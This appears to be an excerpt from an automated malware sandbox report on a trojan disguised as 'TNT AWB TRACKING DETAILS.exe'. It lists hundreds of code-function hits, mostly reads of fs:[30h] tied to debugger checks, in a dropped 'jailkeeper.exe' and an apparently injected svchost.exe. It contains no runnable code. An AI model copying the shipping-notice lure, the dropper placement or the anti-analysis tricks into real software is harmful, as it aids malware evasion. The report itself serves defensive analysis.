                    Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_00EF5A7C EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_00EF5A7C
                    Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_00EC4B37 LoadLibraryA,GetProcAddress,0_2_00EC4B37
                    Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exeCode function: 2_2_015D3550 mov eax, dword ptr fs:[00000030h]2_2_015D3550
                    Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exeCode function: 2_2_015D35B0 mov eax, dword ptr fs:[00000030h]2_2_015D35B0
                    Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exeCode function: 2_2_015D1EA0 mov eax, dword ptr fs:[00000030h]2_2_015D1EA0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B28397 mov eax, dword ptr fs:[00000030h]3_2_03B28397
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B28397 mov eax, dword ptr fs:[00000030h]3_2_03B28397
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B28397 mov eax, dword ptr fs:[00000030h]3_2_03B28397
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B2E388 mov eax, dword ptr fs:[00000030h]3_2_03B2E388
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B2E388 mov eax, dword ptr fs:[00000030h]3_2_03B2E388
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B2E388 mov eax, dword ptr fs:[00000030h]3_2_03B2E388
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B5438F mov eax, dword ptr fs:[00000030h]3_2_03B5438F
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B5438F mov eax, dword ptr fs:[00000030h]3_2_03B5438F
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B4E3F0 mov eax, dword ptr fs:[00000030h]3_2_03B4E3F0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B4E3F0 mov eax, dword ptr fs:[00000030h]3_2_03B4E3F0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B4E3F0 mov eax, dword ptr fs:[00000030h]3_2_03B4E3F0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B663FF mov eax, dword ptr fs:[00000030h]3_2_03B663FF
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B403E9 mov eax, dword ptr fs:[00000030h]3_2_03B403E9
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B403E9 mov eax, dword ptr fs:[00000030h]3_2_03B403E9
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B403E9 mov eax, dword ptr fs:[00000030h]3_2_03B403E9
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B403E9 mov eax, dword ptr fs:[00000030h]3_2_03B403E9
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B403E9 mov eax, dword ptr fs:[00000030h]3_2_03B403E9
                    Source: C:\Windows\SysWOW64\svchost.exe    Code function: 3_2_03B403E9 mov eax, dword ptr fs:[00000030h]    3_2_03B403E9
                    Source: C:\Windows\SysWOW64\svchost.exe    Code function: 3_2_03B403E9 mov eax, dword ptr fs:[00000030h]    3_2_03B403E9
                    Source: C:\Windows\SysWOW64\svchost.exe    Code function: 3_2_03B403E9 mov eax, dword ptr fs:[00000030h]    3_2_03B403E9
                    Source: C:\Windows\SysWOW64\svchost.exe    Code function: 3_2_03BDE3DB mov eax, dword ptr fs:[00000030h]    3_2_03BDE3DB
                    Source: C:\Windows\SysWOW64\svchost.exe    Code function: 3_2_03BDE3DB mov eax, dword ptr fs:[00000030h]    3_2_03BDE3DB
                    Source: C:\Windows\SysWOW64\svchost.exe    Code function: 3_2_03BDE3DB mov ecx, dword ptr fs:[00000030h]    3_2_03BDE3DB
                    Source: C:\Windows\SysWOW64\svchost.exe    Code function: 3_2_03BDE3DB mov eax, dword ptr fs:[00000030h]    3_2_03BDE3DB
                    Source: C:\Windows\SysWOW64\svchost.exe    Code function: 3_2_03BD43D4 mov eax, dword ptr fs:[00000030h]    3_2_03BD43D4
                    Source: C:\Windows\SysWOW64\svchost.exe    Code function: 3_2_03BD43D4 mov eax, dword ptr fs:[00000030h]    3_2_03BD43D4
                    Source: C:\Windows\SysWOW64\svchost.exe    Code function: 3_2_03BEC3CD mov eax, dword ptr fs:[00000030h]    3_2_03BEC3CD
                    Source: C:\Windows\SysWOW64\svchost.exe    Code function: 3_2_03B3A3C0 mov eax, dword ptr fs:[00000030h]    3_2_03B3A3C0
                    Source: C:\Windows\SysWOW64\svchost.exe    Code function: 3_2_03B3A3C0 mov eax, dword ptr fs:[00000030h]    3_2_03B3A3C0
                    Source: C:\Windows\SysWOW64\svchost.exe    Code function: 3_2_03B3A3C0 mov eax, dword ptr fs:[00000030h]    3_2_03B3A3C0
                    Source: C:\Windows\SysWOW64\svchost.exe    Code function: 3_2_03B3A3C0 mov eax, dword ptr fs:[00000030h]    3_2_03B3A3C0
                    Source: C:\Windows\SysWOW64\svchost.exe    Code function: 3_2_03B3A3C0 mov eax, dword ptr fs:[00000030h]    3_2_03B3A3C0
                    Source: C:\Windows\SysWOW64\svchost.exe    Code function: 3_2_03B3A3C0 mov eax, dword ptr fs:[00000030h]    3_2_03B3A3C0
                    Source: C:\Windows\SysWOW64\svchost.exe    Code function: 3_2_03B383C0 mov eax, dword ptr fs:[00000030h]    3_2_03B383C0
                    Source: C:\Windows\SysWOW64\svchost.exe    Code function: 3_2_03B383C0 mov eax, dword ptr fs:[00000030h]    3_2_03B383C0
                    Source: C:\Windows\SysWOW64\svchost.exe    Code function: 3_2_03B383C0 mov eax, dword ptr fs:[00000030h]    3_2_03B383C0
                    Source: C:\Windows\SysWOW64\svchost.exe    Code function: 3_2_03B383C0 mov eax, dword ptr fs:[00000030h]    3_2_03B383C0
                    Source: C:\Windows\SysWOW64\svchost.exe    Code function: 3_2_03BB63C0 mov eax, dword ptr fs:[00000030h]    3_2_03BB63C0
                    Source: C:\Windows\SysWOW64\svchost.exe    Code function: 3_2_03C0634F mov eax, dword ptr fs:[00000030h]    3_2_03C0634F
                    Source: C:\Windows\SysWOW64\svchost.exe    Code function: 3_2_03B2C310 mov ecx, dword ptr fs:[00000030h]    3_2_03B2C310
                    Source: C:\Windows\SysWOW64\svchost.exe    Code function: 3_2_03B50310 mov ecx, dword ptr fs:[00000030h]    3_2_03B50310
                    Source: C:\Windows\SysWOW64\svchost.exe    Code function: 3_2_03B6A30B mov eax, dword ptr fs:[00000030h]    3_2_03B6A30B
                    Source: C:\Windows\SysWOW64\svchost.exe    Code function: 3_2_03B6A30B mov eax, dword ptr fs:[00000030h]    3_2_03B6A30B
                    Source: C:\Windows\SysWOW64\svchost.exe    Code function: 3_2_03B6A30B mov eax, dword ptr fs:[00000030h]    3_2_03B6A30B
                    Source: C:\Windows\SysWOW64\svchost.exe    Code function: 3_2_03BD437C mov eax, dword ptr fs:[00000030h]    3_2_03BD437C
                    Source: C:\Windows\SysWOW64\svchost.exe    Code function: 3_2_03C08324 mov eax, dword ptr fs:[00000030h]    3_2_03C08324
                    Source: C:\Windows\SysWOW64\svchost.exe    Code function: 3_2_03C08324 mov ecx, dword ptr fs:[00000030h]    3_2_03C08324
                    Source: C:\Windows\SysWOW64\svchost.exe    Code function: 3_2_03C08324 mov eax, dword ptr fs:[00000030h]    3_2_03C08324
                    Source: C:\Windows\SysWOW64\svchost.exe    Code function: 3_2_03C08324 mov eax, dword ptr fs:[00000030h]    3_2_03C08324
                    Source: C:\Windows\SysWOW64\svchost.exe    Code function: 3_2_03BB035C mov eax, dword ptr fs:[00000030h]    3_2_03BB035C
                    Source: C:\Windows\SysWOW64\svchost.exe    Code function: 3_2_03BB035C mov eax, dword ptr fs:[00000030h]    3_2_03BB035C
                    Source: C:\Windows\SysWOW64\svchost.exe    Code function: 3_2_03BB035C mov eax, dword ptr fs:[00000030h]    3_2_03BB035C
                    Source: C:\Windows\SysWOW64\svchost.exe    Code function: 3_2_03BB035C mov ecx, dword ptr fs:[00000030h]    3_2_03BB035C
                    Source: C:\Windows\SysWOW64\svchost.exe    Code function: 3_2_03BB035C mov eax, dword ptr fs:[00000030h]    3_2_03BB035C
                    Source: C:\Windows\SysWOW64\svchost.exe    Code function: 3_2_03BB035C mov eax, dword ptr fs:[00000030h]    3_2_03BB035C
                    Source: C:\Windows\SysWOW64\svchost.exe    Code function: 3_2_03BFA352 mov eax, dword ptr fs:[00000030h]    3_2_03BFA352
                    Source: C:\Windows\SysWOW64\svchost.exe    Code function: 3_2_03BD8350 mov ecx, dword ptr fs:[00000030h]    3_2_03BD8350
                    Source: C:\Windows\SysWOW64\svchost.exe    Code function: 3_2_03BB2349 mov eax, dword ptr fs:[00000030h]    3_2_03BB2349
                    Source: C:\Windows\SysWOW64\svchost.exe    Code function: 3_2_03BB2349 mov eax, dword ptr fs:[00000030h]    3_2_03BB2349
                    Source: C:\Windows\SysWOW64\svchost.exe    Code function: 3_2_03BB2349 mov eax, dword ptr fs:[00000030h]    3_2_03BB2349
                    Source: C:\Windows\SysWOW64\svchost.exe    Code function: 3_2_03BB2349 mov eax, dword ptr fs:[00000030h]    3_2_03BB2349
                    Source: C:\Windows\SysWOW64\svchost.exe    Code function: 3_2_03BB2349 mov eax, dword ptr fs:[00000030h]    3_2_03BB2349
                    Source: C:\Windows\SysWOW64\svchost.exe    Code function: 3_2_03BB2349 mov eax, dword ptr fs:[00000030h]    3_2_03BB2349
                    Source: C:\Windows\SysWOW64\svchost.exe    Code function: 3_2_03BB2349 mov eax, dword ptr fs:[00000030h]    3_2_03BB2349
                    Source: C:\Windows\SysWOW64\svchost.exe    Code function: 3_2_03BB2349 mov eax, dword ptr fs:[00000030h]    3_2_03BB2349
                    Source: C:\Windows\SysWOW64\svchost.exe    Code function: 3_2_03BB2349 mov eax, dword ptr fs:[00000030h]    3_2_03BB2349
                    Source: C:\Windows\SysWOW64\svchost.exe    Code function: 3_2_03BB2349 mov eax, dword ptr fs:[00000030h]    3_2_03BB2349
                    Source: C:\Windows\SysWOW64\svchost.exe    Code function: 3_2_03BB2349 mov eax, dword ptr fs:[00000030h]    3_2_03BB2349
                    Source: C:\Windows\SysWOW64\svchost.exe    Code function: 3_2_03BB2349 mov eax, dword ptr fs:[00000030h]    3_2_03BB2349
                    Source: C:\Windows\SysWOW64\svchost.exe    Code function: 3_2_03BB2349 mov eax, dword ptr fs:[00000030h]    3_2_03BB2349
                    Source: C:\Windows\SysWOW64\svchost.exe    Code function: 3_2_03BB2349 mov eax, dword ptr fs:[00000030h]    3_2_03BB2349
                    Source: C:\Windows\SysWOW64\svchost.exe    Code function: 3_2_03BB2349 mov eax, dword ptr fs:[00000030h]    3_2_03BB2349
                    Source: C:\Windows\SysWOW64\svchost.exe    Code function: 3_2_03C062D6 mov eax, dword ptr fs:[00000030h]    3_2_03C062D6
                    Source: C:\Windows\SysWOW64\svchost.exe    Code function: 3_2_03BC62A0 mov eax, dword ptr fs:[00000030h]    3_2_03BC62A0
                    Source: C:\Windows\SysWOW64\svchost.exe    Code function: 3_2_03BC62A0 mov ecx, dword ptr fs:[00000030h]    3_2_03BC62A0
                    Source: C:\Windows\SysWOW64\svchost.exe    Code function: 3_2_03BC62A0 mov eax, dword ptr fs:[00000030h]    3_2_03BC62A0
                    Source: C:\Windows\SysWOW64\svchost.exe    Code function: 3_2_03BC62A0 mov eax, dword ptr fs:[00000030h]    3_2_03BC62A0
                    Source: C:\Windows\SysWOW64\svchost.exe    Code function: 3_2_03BC62A0 mov eax, dword ptr fs:[00000030h]    3_2_03BC62A0
                    Source: C:\Windows\SysWOW64\svchost.exe    Code function: 3_2_03BC62A0 mov eax, dword ptr fs:[00000030h]    3_2_03BC62A0
                    Source: C:\Windows\SysWOW64\svchost.exe    Code function: 3_2_03B6E284 mov eax, dword ptr fs:[00000030h]    3_2_03B6E284
                    Source: C:\Windows\SysWOW64\svchost.exe    Code function: 3_2_03B6E284 mov eax, dword ptr fs:[00000030h]    3_2_03B6E284
                    Source: C:\Windows\SysWOW64\svchost.exe    Code function: 3_2_03BB0283 mov eax, dword ptr fs:[00000030h]    3_2_03BB0283
                    Source: C:\Windows\SysWOW64\svchost.exe    Code function: 3_2_03BB0283 mov eax, dword ptr fs:[00000030h]    3_2_03BB0283
                    Source: C:\Windows\SysWOW64\svchost.exe    Code function: 3_2_03BB0283 mov eax, dword ptr fs:[00000030h]    3_2_03BB0283
                    Source: C:\Windows\SysWOW64\svchost.exe    Code function: 3_2_03B402E1 mov eax, dword ptr fs:[00000030h]    3_2_03B402E1
                    Source: C:\Windows\SysWOW64\svchost.exe    Code function: 3_2_03B402E1 mov eax, dword ptr fs:[00000030h]    3_2_03B402E1
                    Source: C:\Windows\SysWOW64\svchost.exe    Code function: 3_2_03B402E1 mov eax, dword ptr fs:[00000030h]    3_2_03B402E1
                    Source: C:\Windows\SysWOW64\svchost.exe    Code function: 3_2_03B3A2C3 mov eax, dword ptr fs:[00000030h]    3_2_03B3A2C3
                    Source: C:\Windows\SysWOW64\svchost.exe    Code function: 3_2_03B3A2C3 mov eax, dword ptr fs:[00000030h]    3_2_03B3A2C3
                    Source: C:\Windows\SysWOW64\svchost.exe    Code function: 3_2_03B3A2C3 mov eax, dword ptr fs:[00000030h]    3_2_03B3A2C3
                    Source: C:\Windows\SysWOW64\svchost.exe    Code function: 3_2_03B3A2C3 mov eax, dword ptr fs:[00000030h]    3_2_03B3A2C3
                    Source: C:\Windows\SysWOW64\svchost.exe    Code function: 3_2_03B3A2C3 mov eax, dword ptr fs:[00000030h]    3_2_03B3A2C3
                    Source: C:\Windows\SysWOW64\svchost.exe    Code function: 3_2_03B2823B mov eax, dword ptr fs:[00000030h]    3_2_03B2823B
                    Source: C:\Windows\SysWOW64\svchost.exe    Code function: 3_2_03C0625D mov eax, dword ptr fs:[00000030h]    3_2_03C0625D
                    Source: C:\Windows\SysWOW64\svchost.exe    Code function: 3_2_03BE0274 mov eax, dword ptr fs:[00000030h]    3_2_03BE0274
                    Source: C:\Windows\SysWOW64\svchost.exe    Code function: 3_2_03BE0274 mov eax, dword ptr fs:[00000030h]    3_2_03BE0274
                    Source: C:\Windows\SysWOW64\svchost.exe    Code function: 3_2_03BE0274 mov eax, dword ptr fs:[00000030h]    3_2_03BE0274
                    Source: C:\Windows\SysWOW64\svchost.exe    Code function: 3_2_03BE0274 mov eax, dword ptr fs:[00000030h]    3_2_03BE0274
                    Source: C:\Windows\SysWOW64\svchost.exe    Code function: 3_2_03BE0274 mov eax, dword ptr fs:[00000030h]    3_2_03BE0274
                    Source: C:\Windows\SysWOW64\svchost.exe    Code function: 3_2_03BE0274 mov eax, dword ptr fs:[00000030h]    3_2_03BE0274
                    Source: C:\Windows\SysWOW64\svchost.exe    Code function: 3_2_03BE0274 mov eax, dword ptr fs:[00000030h]    3_2_03BE0274
                    Source: C:\Windows\SysWOW64\svchost.exe    Code function: 3_2_03BE0274 mov eax, dword ptr fs:[00000030h]    3_2_03BE0274
                    Source: C:\Windows\SysWOW64\svchost.exe    Code function: 3_2_03BE0274 mov eax, dword ptr fs:[00000030h]    3_2_03BE0274
                    Source: C:\Windows\SysWOW64\svchost.exe    Code function: 3_2_03BE0274 mov eax, dword ptr fs:[00000030h]    3_2_03BE0274
                    Source: C:\Windows\SysWOW64\svchost.exe    Code function: 3_2_03BE0274 mov eax, dword ptr fs:[00000030h]    3_2_03BE0274
                    Source: C:\Windows\SysWOW64\svchost.exe    Code function: 3_2_03BE0274 mov eax, dword ptr fs:[00000030h]    3_2_03BE0274
                    Source: C:\Windows\SysWOW64\svchost.exe    Code function: 3_2_03B34260 mov eax, dword ptr fs:[00000030h]    3_2_03B34260
                    Source: C:\Windows\SysWOW64\svchost.exe    Code function: 3_2_03B34260 mov eax, dword ptr fs:[00000030h]    3_2_03B34260
                    Source: C:\Windows\SysWOW64\svchost.exe    Code function: 3_2_03B34260 mov eax, dword ptr fs:[00000030h]    3_2_03B34260
                    Source: C:\Windows\SysWOW64\svchost.exe    Code function: 3_2_03B2826B mov eax, dword ptr fs:[00000030h]    3_2_03B2826B
                    Source: C:\Windows\SysWOW64\svchost.exe    Code function: 3_2_03B2A250 mov eax, dword ptr fs:[00000030h]    3_2_03B2A250
                    Source: C:\Windows\SysWOW64\svchost.exe    Code function: 3_2_03B36259 mov eax, dword ptr fs:[00000030h]    3_2_03B36259
                    Source: C:\Windows\SysWOW64\svchost.exe    Code function: 3_2_03BEA250 mov eax, dword ptr fs:[00000030h]    3_2_03BEA250
                    Source: C:\Windows\SysWOW64\svchost.exe    Code function: 3_2_03BEA250 mov eax, dword ptr fs:[00000030h]    3_2_03BEA250
                    Source: C:\Windows\SysWOW64\svchost.exe    Code function: 3_2_03BB8243 mov eax, dword ptr fs:[00000030h]    3_2_03BB8243
                    Source: C:\Windows\SysWOW64\svchost.exe    Code function: 3_2_03BB8243 mov ecx, dword ptr fs:[00000030h]    3_2_03BB8243
                    Source: C:\Windows\SysWOW64\svchost.exe    Code function: 3_2_03BB019F mov eax, dword ptr fs:[00000030h]    3_2_03BB019F
                    Source: C:\Windows\SysWOW64\svchost.exe    Code function: 3_2_03BB019F mov eax, dword ptr fs:[00000030h]    3_2_03BB019F
                    Source: C:\Windows\SysWOW64\svchost.exe    Code function: 3_2_03BB019F mov eax, dword ptr fs:[00000030h]    3_2_03BB019F
                    Source: C:\Windows\SysWOW64\svchost.exe    Code function: 3_2_03BB019F mov eax, dword ptr fs:[00000030h]    3_2_03BB019F
                    Source: C:\Windows\SysWOW64\svchost.exe    Code function: 3_2_03B2A197 mov eax, dword ptr fs:[00000030h]    3_2_03B2A197
                    Source: C:\Windows\SysWOW64\svchost.exe    Code function: 3_2_03B2A197 mov eax, dword ptr fs:[00000030h]    3_2_03B2A197
                    Source: C:\Windows\SysWOW64\svchost.exe    Code function: 3_2_03B2A197 mov eax, dword ptr fs:[00000030h]    3_2_03B2A197
                    Source: C:\Windows\SysWOW64\svchost.exe    Code function: 3_2_03C061E5 mov eax, dword ptr fs:[00000030h]    3_2_03C061E5
                    Source: C:\Windows\SysWOW64\svchost.exe    Code function: 3_2_03B70185 mov eax, dword ptr fs:[00000030h]    3_2_03B70185
                    Source: C:\Windows\SysWOW64\svchost.exe    Code function: 3_2_03BEC188 mov eax, dword ptr fs:[00000030h]    3_2_03BEC188
                    Source: C:\Windows\SysWOW64\svchost.exe    Code function: 3_2_03BEC188 mov eax, dword ptr fs:[00000030h]    3_2_03BEC188
                    Source: C:\Windows\SysWOW64\svchost.exe    Code function: 3_2_03BD4180 mov eax, dword ptr fs:[00000030h]    3_2_03BD4180
                    Source: C:\Windows\SysWOW64\svchost.exe    Code function: 3_2_03BD4180 mov eax, dword ptr fs:[00000030h]    3_2_03BD4180
                    Source: C:\Windows\SysWOW64\svchost.exe    Code function: 3_2_03B601F8 mov eax, dword ptr fs:[00000030h]    3_2_03B601F8
                    Source: C:\Windows\SysWOW64\svchost.exe    Code function: 3_2_03BAE1D0 mov eax, dword ptr fs:[00000030h]    3_2_03BAE1D0
                    Source: C:\Windows\SysWOW64\svchost.exe    Code function: 3_2_03BAE1D0 mov eax, dword ptr fs:[00000030h]    3_2_03BAE1D0
                    Source: C:\Windows\SysWOW64\svchost.exe    Code function: 3_2_03BAE1D0 mov ecx, dword ptr fs:[00000030h]    3_2_03BAE1D0
                    Source: C:\Windows\SysWOW64\svchost.exe    Code function: 3_2_03BAE1D0 mov eax, dword ptr fs:[00000030h]    3_2_03BAE1D0
                    Source: C:\Windows\SysWOW64\svchost.exe    Code function: 3_2_03BAE1D0 mov eax, dword ptr fs:[00000030h]    3_2_03BAE1D0
                    Source: C:\Windows\SysWOW64\svchost.exe    Code function: 3_2_03BF61C3 mov eax, dword ptr fs:[00000030h]    3_2_03BF61C3
                    Source: C:\Windows\SysWOW64\svchost.exe    Code function: 3_2_03BF61C3 mov eax, dword ptr fs:[00000030h]    3_2_03BF61C3
                    Source: C:\Windows\SysWOW64\svchost.exe    Code function: 3_2_03B60124 mov eax, dword ptr fs:[00000030h]    3_2_03B60124
                    Source: C:\Windows\SysWOW64\svchost.exe    Code function: 3_2_03C04164 mov eax, dword ptr fs:[00000030h]    3_2_03C04164
                    Source: C:\Windows\SysWOW64\svchost.exe    Code function: 3_2_03C04164 mov eax, dword ptr fs:[00000030h]    3_2_03C04164
                    Source: C:\Windows\SysWOW64\svchost.exe    Code function: 3_2_03BDA118 mov ecx, dword ptr fs:[00000030h]    3_2_03BDA118
                    Source: C:\Windows\SysWOW64\svchost.exe    Code function: 3_2_03BDA118 mov eax, dword ptr fs:[00000030h]    3_2_03BDA118
                    Source: C:\Windows\SysWOW64\svchost.exe    Code function: 3_2_03BDA118 mov eax, dword ptr fs:[00000030h]    3_2_03BDA118
                    Source: C:\Windows\SysWOW64\svchost.exe    Code function: 3_2_03BDA118 mov eax, dword ptr fs:[00000030h]    3_2_03BDA118
                    Source: C:\Windows\SysWOW64\svchost.exe    Code function: 3_2_03BF0115 mov eax, dword ptr fs:[00000030h]    3_2_03BF0115
                    Source: C:\Windows\SysWOW64\svchost.exe    Code function: 3_2_03BDE10E mov eax, dword ptr fs:[00000030h]    3_2_03BDE10E
                    Source: C:\Windows\SysWOW64\svchost.exe    Code function: 3_2_03BDE10E mov ecx, dword ptr fs:[00000030h]    3_2_03BDE10E
                    Source: C:\Windows\SysWOW64\svchost.exe    Code function: 3_2_03BDE10E mov eax, dword ptr fs:[00000030h]    3_2_03BDE10E
                    Source: C:\Windows\SysWOW64\svchost.exe    Code function: 3_2_03BDE10E mov eax, dword ptr fs:[00000030h]    3_2_03BDE10E
                    Source: C:\Windows\SysWOW64\svchost.exe    Code function: 3_2_03BDE10E mov ecx, dword ptr fs:[00000030h]    3_2_03BDE10E
                    Source: C:\Windows\SysWOW64\svchost.exe    Code function: 3_2_03BDE10E mov eax, dword ptr fs:[00000030h]    3_2_03BDE10E
                    Source: C:\Windows\SysWOW64\svchost.exe    Code function: 3_2_03BDE10E mov eax, dword ptr fs:[00000030h]    3_2_03BDE10E
                    Source: C:\Windows\SysWOW64\svchost.exe    Code function: 3_2_03BDE10E mov ecx, dword ptr fs:[00000030h]    3_2_03BDE10E
                    Source: C:\Windows\SysWOW64\svchost.exe    Code function: 3_2_03BDE10E mov eax, dword ptr fs:[00000030h]    3_2_03BDE10E
                    Source: C:\Windows\SysWOW64\svchost.exe    Code function: 3_2_03BDE10E mov ecx, dword ptr fs:[00000030h]    3_2_03BDE10E
                    Source: C:\Windows\SysWOW64\svchost.exe    Code function: 3_2_03B2C156 mov eax, dword ptr fs:[00000030h]    3_2_03B2C156
                    Source: C:\Windows\SysWOW64\svchost.exe    Code function: 3_2_03BC8158 mov eax, dword ptr fs:[00000030h]    3_2_03BC8158
                    Source: C:\Windows\SysWOW64\svchost.exe    Code function: 3_2_03B36154 mov eax, dword ptr fs:[00000030h]    3_2_03B36154
                    Source: C:\Windows\SysWOW64\svchost.exe    Code function: 3_2_03B36154 mov eax, dword ptr fs:[00000030h]    3_2_03B36154
                    Source: C:\Windows\SysWOW64\svchost.exe    Code function: 3_2_03BC4144 mov eax, dword ptr fs:[00000030h]    3_2_03BC4144
                    Source: C:\Windows\SysWOW64\svchost.exe    Code function: 3_2_03BC4144 mov eax, dword ptr fs:[00000030h]    3_2_03BC4144
                    Source: C:\Windows\SysWOW64\svchost.exe    Code function: 3_2_03BC4144 mov ecx, dword ptr fs:[00000030h]    3_2_03BC4144
                    Source: C:\Windows\SysWOW64\svchost.exe    Code function: 3_2_03BC4144 mov eax, dword ptr fs:[00000030h]    3_2_03BC4144
                    Source: C:\Windows\SysWOW64\svchost.exe    Code function: 3_2_03BC4144 mov eax, dword ptr fs:[00000030h]    3_2_03BC4144
                    Source: C:\Windows\SysWOW64\svchost.exe    Code function: 3_2_03BF60B8 mov eax, dword ptr fs:[00000030h]    3_2_03BF60B8
                    Source: C:\Windows\SysWOW64\svchost.exe    Code function: 3_2_03BF60B8 mov ecx, dword ptr fs:[00000030h]    3_2_03BF60B8
                    Source: C:\Windows\SysWOW64\svchost.exe    Code function: 3_2_03B280A0 mov eax, dword ptr fs:[00000030h]    3_2_03B280A0
                    Source: C:\Windows\SysWOW64\svchost.exe    Code function: 3_2_03BC80A8 mov eax, dword ptr fs:[00000030h]    3_2_03BC80A8
                    Source: C:\Windows\SysWOW64\svchost.exe    Code function: 3_2_03B3208A mov eax, dword ptr fs:[00000030h]    3_2_03B3208A
                    Source: C:\Windows\SysWOW64\svchost.exe    Code function: 3_2_03B2C0F0 mov eax, dword ptr fs:[00000030h]    3_2_03B2C0F0
                    Source: C:\Windows\SysWOW64\svchost.exe    Code function: 3_2_03B720F0 mov ecx, dword ptr fs:[00000030h]    3_2_03B720F0
                    Source: C:\Windows\SysWOW64\svchost.exe    Code function: 3_2_03B2A0E3 mov ecx, dword ptr fs:[00000030h]    3_2_03B2A0E3
                    Source: C:\Windows\SysWOW64\svchost.exe    Code function: 3_2_03B380E9 mov eax, dword ptr fs:[00000030h]    3_2_03B380E9
                    Source: C:\Windows\SysWOW64\svchost.exe    Code function: 3_2_03BB60E0 mov eax, dword ptr fs:[00000030h]    3_2_03BB60E0
                    Source: C:\Windows\SysWOW64\svchost.exe    Code function: 3_2_03BB20DE mov eax, dword ptr fs:[00000030h]    3_2_03BB20DE
                    Source: C:\Windows\SysWOW64\svchost.exe    Code function: 3_2_03BC6030 mov eax, dword ptr fs:[00000030h]    3_2_03BC6030
                    Source: C:\Windows\SysWOW64\svchost.exe    Code function: 3_2_03B2A020 mov eax, dword ptr fs:[00000030h]    3_2_03B2A020
                    Source: C:\Windows\SysWOW64\svchost.exe    Code function: 3_2_03B2C020 mov eax, dword ptr fs:[00000030h]    3_2_03B2C020
                    Source: C:\Windows\SysWOW64\svchost.exe    Code function: 3_2_03B4E016 mov eax, dword ptr fs:[00000030h]    3_2_03B4E016
                    Source: C:\Windows\SysWOW64\svchost.exe    Code function: 3_2_03B4E016 mov eax, dword ptr fs:[00000030h]    3_2_03B4E016
                    Source: C:\Windows\SysWOW64\svchost.exe    Code function: 3_2_03B4E016 mov eax, dword ptr fs:[00000030h]    3_2_03B4E016
                    Source: C:\Windows\SysWOW64\svchost.exe    Code function: 3_2_03B4E016 mov eax, dword ptr fs:[00000030h]    3_2_03B4E016
                    Source: C:\Windows\SysWOW64\svchost.exe    Code function: 3_2_03BB4000 mov ecx, dword ptr fs:[00000030h]    3_2_03BB4000
                    Source: C:\Windows\SysWOW64\svchost.exe    Code function: 3_2_03BD2000 mov eax, dword ptr fs:[00000030h]    3_2_03BD2000
                    Source: C:\Windows\SysWOW64\svchost.exe    Code function: 3_2_03BD2000 mov eax, dword ptr fs:[00000030h]    3_2_03BD2000
                    Source: C:\Windows\SysWOW64\svchost.exe    Code function: 3_2_03BD2000 mov eax, dword ptr fs:[00000030h]    3_2_03BD2000
                    Source: C:\Windows\SysWOW64\svchost.exe    Code function: 3_2_03BD2000 mov eax, dword ptr fs:[00000030h]    3_2_03BD2000
                    Source: C:\Windows\SysWOW64\svchost.exe    Code function: 3_2_03BD2000 mov eax, dword ptr fs:[00000030h]    3_2_03BD2000
                    Source: C:\Windows\SysWOW64\svchost.exe    Code function: 3_2_03BD2000 mov eax, dword ptr fs:[00000030h]    3_2_03BD2000
                    Source: C:\Windows\SysWOW64\svchost.exe    Code function: 3_2_03BD2000 mov eax, dword ptr fs:[00000030h]    3_2_03BD2000
                    Source: C:\Windows\SysWOW64\svchost.exe    Code function: 3_2_03BD2000 mov eax, dword ptr fs:[00000030h]    3_2_03BD2000
                    Source: C:\Windows\SysWOW64\svchost.exe    Code function: 3_2_03B5C073 mov eax, dword ptr fs:[00000030h]    3_2_03B5C073
                    Source: C:\Windows\SysWOW64\svchost.exe    Code function: 3_2_03B32050 mov eax, dword ptr fs:[00000030h]    3_2_03B32050
                    Source: C:\Windows\SysWOW64\svchost.exe    Code function: 3_2_03BB6050 mov eax, dword ptr fs:[00000030h]    3_2_03BB6050
                    Source: C:\Windows\SysWOW64\svchost.exe    Code function: 3_2_03B307AF mov eax, dword ptr fs:[00000030h]    3_2_03B307AF
                    Source: C:\Windows\SysWOW64\svchost.exe    Code function: 3_2_03BE47A0 mov eax, dword ptr fs:[00000030h]    3_2_03BE47A0
                    Source: C:\Windows\SysWOW64\svchost.exe    Code function: 3_2_03BD678E mov eax, dword ptr fs:[00000030h]    3_2_03BD678E
                    Source: C:\Windows\SysWOW64\svchost.exe    Code function: 3_2_03B347FB mov eax, dword ptr fs:[00000030h]    3_2_03B347FB
                    Source: C:\Windows\SysWOW64\svchost.exe    Code function: 3_2_03B347FB mov eax, dword ptr fs:[00000030h]    3_2_03B347FB
                    Source: C:\Windows\SysWOW64\svchost.exe    Code function: 3_2_03B527ED mov eax, dword ptr fs:[00000030h]    3_2_03B527ED
                    Source: C:\Windows\SysWOW64\svchost.exe    Code function: 3_2_03B527ED mov eax, dword ptr fs:[00000030h]    3_2_03B527ED
                    Source: C:\Windows\SysWOW64\svchost.exe    Code function: 3_2_03B527ED mov eax, dword ptr fs:[00000030h]    3_2_03B527ED
